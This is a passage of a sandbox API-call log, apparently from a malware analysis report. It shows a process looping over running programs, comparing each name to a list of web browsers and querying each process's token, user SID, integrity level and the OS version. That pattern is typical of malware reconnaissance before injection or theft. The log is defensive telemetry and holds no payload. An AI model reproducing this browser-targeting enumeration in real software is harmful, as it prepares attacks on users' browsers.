(pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0220.699] CloseHandle (hObject=0x58c) returned 1 [0220.699] CloseHandle (hObject=0x584) returned 1 [0220.700] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0220.700] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0220.700] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0220.700] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0220.700] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0220.700] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0220.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0x584 [0220.700] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x58c) returned 1 [0220.700] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0220.701] GetLastError () returned 0x7a [0220.701] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0220.701] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0220.701] CloseHandle (hObject=0x58c) returned 1 [0220.701] CloseHandle (hObject=0x584) returned 1 [0220.701] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0x584 [0220.701] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d75a8, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.701] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x58c) returned 1 [0220.701] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0220.702] GetLastError () returned 0x7a [0220.702] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0220.702] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0220.702] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0220.702] CloseHandle (hObject=0x58c) returned 1 [0220.702] CloseHandle (hObject=0x584) returned 1 [0220.702] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0220.702] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0220.703] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0220.703] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0220.703] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0220.703] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0220.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0x584 [0220.703] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x58c) returned 1 [0220.703] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0220.703] GetLastError () returned 0x7a [0220.703] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0220.703] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0220.703] CloseHandle (hObject=0x58c) returned 1 [0220.703] CloseHandle (hObject=0x584) returned 1 [0220.703] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0x584 [0220.704] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d76f8, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.704] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x58c) returned 1 [0220.704] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0220.704] GetLastError () returned 0x7a [0220.704] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0220.704] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0220.704] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0220.704] CloseHandle (hObject=0x58c) returned 1 [0220.704] CloseHandle (hObject=0x584) returned 1 [0220.705] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0220.705] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0220.705] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0220.705] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0220.705] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0220.705] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0220.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0x584 [0220.705] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x58c) returned 1 [0220.705] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0220.705] GetLastError () returned 0x7a [0220.705] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0220.705] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0220.705] CloseHandle (hObject=0x58c) returned 1 [0220.705] CloseHandle (hObject=0x584) returned 1 [0220.705] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0x584 [0220.706] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d7870, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.706] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x58c) returned 1 [0220.706] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0220.706] GetLastError () returned 0x7a [0220.706] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0220.706] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0220.706] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0220.706] CloseHandle (hObject=0x58c) returned 1 [0220.706] CloseHandle (hObject=0x584) returned 1 [0220.707] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0220.707] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0220.707] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0220.707] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0220.707] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0220.707] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0220.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0x584 [0220.707] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x58c) returned 1 [0220.707] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0220.707] GetLastError () returned 0x7a [0220.707] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0220.707] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0220.707] CloseHandle (hObject=0x58c) returned 1 [0220.707] CloseHandle (hObject=0x584) returned 1 [0220.707] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0x584 [0220.707] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d79e0, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.707] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x58c) returned 1 [0220.708] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0220.708] GetLastError () returned 0x7a [0220.708] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0220.708] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0220.708] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0220.708] CloseHandle (hObject=0x58c) returned 1 [0220.708] CloseHandle (hObject=0x584) returned 1 [0220.708] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0220.708] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0220.708] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0220.708] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0220.708] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0220.708] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0220.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0x584 [0220.708] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x58c) returned 1 [0220.709] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0220.709] GetLastError () returned 0x7a [0220.709] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0220.709] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0220.709] CloseHandle (hObject=0x58c) returned 1 [0220.709] CloseHandle (hObject=0x584) returned 1 [0220.709] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0x584 [0220.709] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d7b60, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.709] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x58c) returned 1 [0220.709] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0220.709] GetLastError () returned 0x7a [0220.709] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0220.709] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0220.709] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0220.709] CloseHandle (hObject=0x58c) returned 1 [0220.709] CloseHandle (hObject=0x584) returned 1 [0220.710] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0220.710] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0220.710] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0220.710] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0220.710] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0220.710] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0220.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0x584 [0220.710] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x58c) returned 1 [0220.710] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0220.710] GetLastError () returned 0x7a [0220.710] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0220.710] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0220.710] CloseHandle (hObject=0x58c) returned 1 [0220.710] CloseHandle (hObject=0x584) returned 1 [0220.710] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0x584 [0220.711] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d7cb8, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.711] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x58c) returned 1 [0220.711] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0220.711] GetLastError () returned 0x7a [0220.711] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0220.711] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0220.711] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0220.711] CloseHandle (hObject=0x58c) returned 1 [0220.711] CloseHandle (hObject=0x584) returned 1 [0220.711] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0220.711] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0220.711] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0220.711] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0220.711] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0220.712] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0220.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0x584 [0220.712] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x58c) returned 1 [0220.712] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0220.712] GetLastError () returned 0x7a [0220.712] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0220.712] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0220.712] CloseHandle (hObject=0x58c) returned 1 [0220.712] CloseHandle (hObject=0x584) returned 1 [0220.712] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0x584 [0220.712] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d7e08, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.712] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x58c) returned 1 [0220.712] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0220.712] GetLastError () returned 0x7a [0220.712] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0220.712] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0220.712] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0220.712] CloseHandle (hObject=0x58c) returned 1 [0220.712] CloseHandle (hObject=0x584) returned 1 [0220.713] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0220.713] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0220.713] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0220.713] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0220.713] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0220.713] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0220.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0x584 [0220.713] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x58c) returned 1 [0220.713] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0220.713] GetLastError () returned 0x7a [0220.713] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0220.713] 